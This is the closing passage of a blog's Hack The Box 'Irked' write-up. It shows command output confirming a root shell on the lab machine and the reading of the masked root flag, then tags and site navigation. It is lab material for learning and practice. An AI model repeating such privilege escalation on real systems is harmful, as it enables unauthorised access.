</span><span class="nv">uid</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>1000<span class="o">(</span>djmardov<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>1000<span class="o">(</span>djmardov<span class="o">)</span>,24<span class="o">(</span>cdrom<span class="o">)</span>,25<span class="o">(</span>floppy<span class="o">)</span>,29<span class="o">(</span>audio<span class="o">)</span>,30<span class="o">(</span>dip<span class="o">)</span>,44<span class="o">(</span>video<span class="o">)</span>,46<span class="o">(</span>plugdev<span class="o">)</span>,108<span class="o">(</span>netdev<span class="o">)</span>,110<span class="o">(</span>lpadmin<span class="o">)</span>,113<span class="o">(</span>scanner<span class="o">)</span>,117<span class="o">(</span>bluetooth<span class="o">)</span>
</pre></table></code></div></div><p>We managed to get a shell as <code class="language-plaintext highlighter-rouge">root</code>!</p><h1 id="roottxt">root.txt</h1><p>The root flag is in <code class="language-plaintext highlighter-rouge">root</code>’s home directory.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre>root@irked:/tmp# <span class="nb">cat</span> /root/root.txt
8d8eXXXXXXXXXXXXXXXXXXXXXXXXXXXX
</pre></table></code></div></div><h3 id="rooted--thank-you-for-reading-and-look-forward-for-more-writeups-and-articles-">Rooted ! Thank you for reading and look forward for more writeups and articles !</h3></div><div class="post-tail-wrapper text-muted"><div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw mr-1"></i> <a href='/categories/hackthebox/'>hackthebox</a></div><div class="post-tags"> <i class="fa fa-tags fa-fw mr-1"></i> <a href="/tags/linux/" class="post-tag no-text-decoration" >linux</a> <a href="/tags/unrealirc/" class="post-tag no-text-decoration" >unrealirc</a> <a href="/tags/steg/" class="post-tag no-text-decoration" >steg</a> <a href="/tags/suid/" class="post-tag no-text-decoration" >suid</a></div><div class="post-tail-bottom d-flex justify-content-between align-items-center mt-3 pt-5 pb-2"><div class="license-wrapper"> This post is licensed under <a href="https://creativecommons.org/licenses/by/4.0/">CC BY 4.0</a> by the author.</div><div class="share-wrapper"> <span class="share-label text-muted mr-1">Share</span> <span class="share-icons"> <a href="https://twitter.com/intent/tweet?text=Hack The Box - Irked (Without Metasploit) - rizemon's blog&url=https://rizemon.github.io/posts/irked-htb/" data-toggle="tooltip" data-placement="top" title="Twitter" target="_blank" rel="noopener" aria-label="Twitter"> <i class="fa-fw fab fa-twitter"></i> </a> <a href="https://www.facebook.com/sharer/sharer.php?title=Hack The Box - Irked (Without Metasploit) - rizemon's blog&u=https://rizemon.github.io/posts/irked-htb/" data-toggle="tooltip" data-placement="top" title="Facebook" target="_blank" rel="noopener" aria-label="Facebook"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="https://telegram.me/share?text=Hack The Box - Irked (Without Metasploit) - rizemon's blog&url=https://rizemon.github.io/posts/irked-htb/" data-toggle="tooltip" data-placement="top" title="Telegram" target="_blank" rel="noopener" aria-label="Telegram"> <i class="fa-fw fab fa-telegram"></i> </a> <i class="fa-fw fas fa-link small" onclick="copyLink()" data-toggle="tooltip" data-placement="top" title="Copy link"></i> </span></div></div></div></div></div><div id="panel-wrapper" class="col-xl-3 pl-2 text-muted topbar-down"><div class="access"><div id="access-lastmod" class="post"> <span>Recent Update</span><ul class="post-content pl-0 pb-1 ml-1 mt-2"><li><a href="/posts/htbcybersanta-ctf/">HackTheBox CTF - Cyber Santa</a><li><a href="/posts/ticket1part2-thm/">TryHackMe - Pre Security Learning Path (Part 2) [PARTICIPATE IN THE GIVEAWAY!]</a><li><a href="/posts/oscp-reflection/">Post-OSCP Writeup</a><li><a href="/posts/granny-htb/">Hack The Box - Granny (Without Metasploit)</a><li><a href="/posts/cronos-htb/">Hack The Box - Cronos (Without Metasploit)</a></ul></div><div id="access-tags"> <span>Trending Tags</span><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/linux/">linux</a> <a class="post-tag" href="/tags/windows/">windows</a> <a class="post-tag" href="/tags/php/">php</a> <a class="post-tag" href="/tags/ssh/">ssh</a> <a class="post-tag" href="/tags/sqli/">sqli</a> <a class="post-tag" href="/tags/lfi/">lfi</a> <a class="post-tag" href="/tags/juicypotato/">juicypotato</a> <a class="post-tag" href="/tags/rsa/">rsa</a> <a class="post-tag" href="/tags/smb/">smb</a> <a class="post-tag" href="/tags/sudo/">sudo</a></div></div></div><div id="toc-wrapper" class="pl-0 pr-4 mb-5"> <span class="pl-3 pt-2 mb-2">Contents</span><nav id="toc" data-toggle="toc"></nav></div></div></div><div class="row"><div class="col-12 col-lg-11 col-xl-8"><div id="post-extend-wrapper" class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><div id="related-posts" class="mt-5 mb-2 mb-sm-4"><h3 class="pt-2 mt-1 mb-4 ml-1" data-toc-skip>Further Reading</h3><div class="card-deck mb-4"><div class="card"> <a href="/posts/dsonus2021-insecure-ctf/"><div class="card-body"> <span class="timeago small" > Aug 2, 2021 <i class="unloaded">2021-08-02T17:19:00+08:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>DSO NUS CTF - Insecure</h3><div class="text-muted small"><p> Description Someone once told me that SUID is a bad idea. Could you show me why? This challenge server can be accessed here: (Any one of the options below is fine) (Suggested access via ‘...</p></div></div></a></div><div class="card"> <a href="/posts/delivery-htb/"><div class="card-body"> <span class="timeago small" > May 23, 2021 <i class="unloaded">2021-05-23T03:00:00+08:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Hack The Box - Delivery</h3><div class="text-muted small"><p> Configuration The operating system that I will be using to tackle this machine is a Kali Linux VM. What I learnt from other writeups is that it was a good habit to map a domain name to the mach...</p></div></div></a></div><div class="card"> <a href="/posts/swagshop-htb/"><div class="card-body"> <span class="timeago small" > Sep 29, 2019 <i class="unloaded">2019-09-29T10:00:00+08:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Hack The Box - Swagshop</h3><div class="text-muted small"><p> This machine was not my first Linux machine but I had fun rooted this machine ! :D Configuration The operating system that I will be using to tackle this machine is a Kali Linux VM. Always rem...</p></div></div></a></div></div></div><div class="post-navigation d-flex justify-content-between"> <a href="/posts/tartarsauce-htb/" class="btn btn-outline-primary"><p>Hack The Box - TartarSauce (Without Metasploit)</p></a> <a href="/posts/friendzone-htb/" class="btn btn-outline-primary"><p>Hack The Box - FriendZone (Without Metasploit)</p></a></div></div></div></div><script type="text/javascript" src="https://cdn.jsdelivr.net/npm/lozad/dist/lozad.min.js"></script> <script type="text/javascript"> const imgs = document.querySelectorAll('#post-wrapper img'); const observer = lozad(imgs); observer.observe(); </script><footer class="d-flex w-100 justify-content-center"><div class="d-flex justify-content-between align-items-center"><div class="footer-left"><p class="mb-0"> © 2022 <a href="https://twitter.com/rizemon">rizemon</a>. <span data-toggle="tooltip" data-placement="top" title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span></p></div><div class="footer-right"><p class="mb-0"> Powered by <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a> with <a href="https://github.com/cotes2020/jekyll-theme-chirpy/" target="_blank" rel="noopener">Chirpy</a> theme.</p></div></div></footer></div><div id="search-result-wrapper" class="d-flex justify-content-center unloaded"><div class="col-12 col-xl-11 post-content"><div id="search-hints"><h4 class="text-muted mb-4">Trending Tags</h4><a class="post-tag" href="/tags/linux/">linux</a> <a class="post-tag" href="/tags/windows/">windows</a> <a class="post-tag" href="/tags/php/">php</a> <a class="post-tag" href="/tags/ssh/">ssh</a> <a class="post-tag" href="/tags/sqli/">sqli</a> <a class="post-tag" href="/tags/lfi/">lfi</a> <a class="post-tag" href="/tags/juicypotato/">juicypotato</a> <a class="post-tag" href="/tags/rsa/">rsa</a> <a class="post-tag" href="/tags/smb/">smb</a> <a class="post-tag" href="/tags/sudo/">sudo</a></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><div id="mask"></div><a id="back-to-top" href="#" aria-label="back-to-top" class="btn btn-lg btn-box-shadow" role="button"> <i class="fas fa-angle-up"></i> </a> <script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.7.3/dest/simple-jekyll-search.min.js"></script> <script> SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/assets/js/data/search.json', searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0"> <a href="https://rizemon.github.io{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"><div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>{categories}</div><div><i class="fa fa-tag fa-fw"></i>{tags}</div></div><p>{snippet}</p></div>', noResultsText: '<p class="mt-5">Oops! No result founds.</p>' }); </script>
